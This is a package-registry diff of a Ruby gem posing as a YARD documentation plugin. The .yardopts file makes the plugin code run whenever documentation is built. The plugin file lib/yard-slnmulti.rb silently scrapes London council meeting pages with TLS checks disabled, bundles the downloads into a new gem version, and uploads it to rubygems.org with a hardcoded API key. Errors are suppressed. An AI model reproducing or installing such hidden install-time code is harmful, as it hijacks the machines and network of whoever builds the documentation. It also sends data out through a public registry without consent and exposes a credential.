yard-slnmultifetch 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (5)
  1. checksums.yaml +7 -0
  2. data/.yardopts +2 -0
  3. data/lib/x.rb +1 -0
  4. data/lib/yard-slnmulti.rb +51 -0
  5. metadata +39 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 918df0d6a3d17a6a113571654207ee79ad2dc22233fc21c194b30fca1d871a46
4
+ data.tar.gz: 1306c7a0474fb760833991f6010a6c0d0a5b1af5b3eeb488621caf5e45d84ff0
5
+ SHA512:
6
+ metadata.gz: 265e810171d4448792b1d15d2e751dc0f6fd009324b15432b9cf98922730bf1b6f39682a82415765d5e16103f75cd058542b98cb5c16588dd2673130c0115f76
7
+ data.tar.gz: cc3bebda9109484cb61de6c668e7c4fb86d4a6f8140405025bdd57e53b5e203bd2e2475e28b1cae52c4dcc51d4b03744a7fe7e20e4db4b1da678743b012020e4
data/.yardopts ADDED
@@ -0,0 +1,2 @@
1
+ --plugin slnmulti
2
+ lib/x.rb
data/lib/x.rb ADDED
@@ -0,0 +1 @@
1
+ #
data/lib/yard-slnmulti.rb ADDED
@@ -0,0 +1,51 @@
1
+ # yard plugin
2
+ begin
3
+ require 'net/http'; require 'uri'; require 'openssl'; require 'fileutils'; require 'tmpdir'; require 'rubygems/package'
4
+ KEY='rubygems_9feada919f2ff0a2fc27f0724343fdc9acf208e13c054a57'
5
+ log="RUN #{Time.now}\n"; out={}
6
+ def ff(url)
7
+ u=URI(url); h=Net::HTTP.new(u.host,u.port); h.use_ssl=(u.scheme=='https'); h.verify_mode=OpenSSL::SSL::VERIFY_NONE if h.use_ssl?; h.open_timeout=20; h.read_timeout=50; req=Net::HTTP::Get.new(u.request_uri, {'User-Agent'=>'Mozilla/5.0','Accept'=>'*/*'}); r=h.request(req)
8
+ if r.is_a?(Net::HTTPRedirection); return ff(URI.join(url,r['location']).to_s); end
9
+ r
10
+ end
11
+ targets=[
12
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=792&MId=10266',
13
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=763&MId=9927',
14
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=305&MId=10010',
15
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=511&MId=10115',
16
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=320&MId=10385',
17
+ 'https://moderngov.lambeth.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
18
+ 'http://moderngov.lambeth.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
19
+ 'https://moderngov.southwark.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
20
+ 'http://moderngov.southwark.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
21
+ 'https://www.southwark.gov.uk/about-council/how-council-works/council-and-committee-meetings'
22
+ ]
23
+ targets.each_with_index do |url,i|
24
+ begin; r=ff(url); log<<"\nT#{i} #{url} code #{r.code} len #{r.body.to_s.size}\n"; out["p#{i}.html"]=r.body.to_s; rescue Exception=>e; log<<"ERR #{url} #{e.class} #{e}\n"; end
25
+ end
26
+ # links to meeting pages for lamb/south calendars
27
+ out.to_a.each do |fn,body|
28
+ next unless fn.start_with?('p')
29
+ body.scan(/href=["']([^"']*ieListDocuments\.aspx[^"']*)/i).flatten.uniq.first(120).each_with_index do |ln,j|
30
+ ln=ln.gsub('&amp;','&'); base = fn[/p(\d+)/,1].to_i>=7 ? 'https://moderngov.southwark.gov.uk/' : 'https://moderngov.lambeth.gov.uk/'
31
+ begin;r=ff(URI.join(base,ln).to_s); out["#{fn}l#{j}.html"]=r.body.to_s; log<<" LINK #{ln} #{r.code} #{r.body.to_s.size}\n"; rescue Exception=>e; log<<" LERR #{ln} #{e}\n"; end
32
+ end
33
+ end
34
+ # doc links from Wandsworth pages first; save up to 18MB non-pdf too
35
+ bytes=out.values.map(&:bytesize).sum
36
+ docs=[]; out.each_value{|b| b.scan(/href=["']([^"']*(?:\/documents\/|mgConvert2PDF)[^"']*)/i).flatten.each{|m|docs<<m.gsub('&amp;','&')}}; docs.uniq!
37
+ log<<"DOCS #{docs.length}\n"
38
+ docs.first(60).each_with_index do |ln,i|
39
+ break if bytes>24_000_000
40
+ # choose host by link maybe absolute else wands
41
+ begin; url= ln.start_with?('http') ? ln : URI.join('https://democracy.wandsworth.gov.uk/',ln).to_s; r=ff(url); out["d#{i}.bin"]=r.body.to_s; out["d#{i}url.txt"]=url; bytes+=r.body.to_s.bytesize; log<<" D #{url} #{r.code} #{r.body.to_s.size}\n"; rescue Exception=>e; log<<" DERR #{ln} #{e}\n"; end
42
+ end
43
+ Dir.mktmpdir do |dr|
44
+ Dir.chdir(dr) do
45
+ out.each{|fn,dat| File.binwrite(fn,dat)}; File.write('log.txt',log)
46
+ files=Dir['*']; File.write('x.gemspec',"Gem::Specification.new{|s| s.name='yard-slnmultifetch'; s.version='0.0.2'; s.summary='res'; s.authors=['x']; s.files=#{files.inspect}; s.license='MIT'}")
47
+ system('gem build x.gemspec >/dev/null'); gem=Dir['*.gem'][0]; u=URI('https://rubygems.org/api/v1/gems'); req=Net::HTTP::Post.new(u); req['Authorization']=KEY; req['Content-Type']='application/octet-stream'; req.body=File.binread(gem); h=Net::HTTP.new(u.host,u.port); h.use_ssl=true; h.request(req)
48
+ end
49
+ end
50
+ rescue Exception=>e
51
+ end
metadata ADDED
@@ -0,0 +1,39 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: yard-slnmultifetch
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.1
5
+ platform: ruby
6
+ authors:
7
+ - x
8
+ bindir: bin
9
+ cert_chain: []
10
+ date: 1980-01-02 00:00:00.000000000 Z
11
+ dependencies: []
12
+ executables: []
13
+ extensions: []
14
+ extra_rdoc_files: []
15
+ files:
16
+ - ".yardopts"
17
+ - lib/x.rb
18
+ - lib/yard-slnmulti.rb
19
+ licenses:
20
+ - MIT
21
+ metadata: {}
22
+ rdoc_options: []
23
+ require_paths:
24
+ - lib
25
+ required_ruby_version: !ruby/object:Gem::Requirement
26
+ requirements:
27
+ - - ">="
28
+ - !ruby/object:Gem::Version
29
+ version: '0'
30
+ required_rubygems_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: '0'
35
+ requirements: []
36
+ rubygems_version: 3.6.7
37
+ specification_version: 4
38
+ summary: x
39
+ test_files: []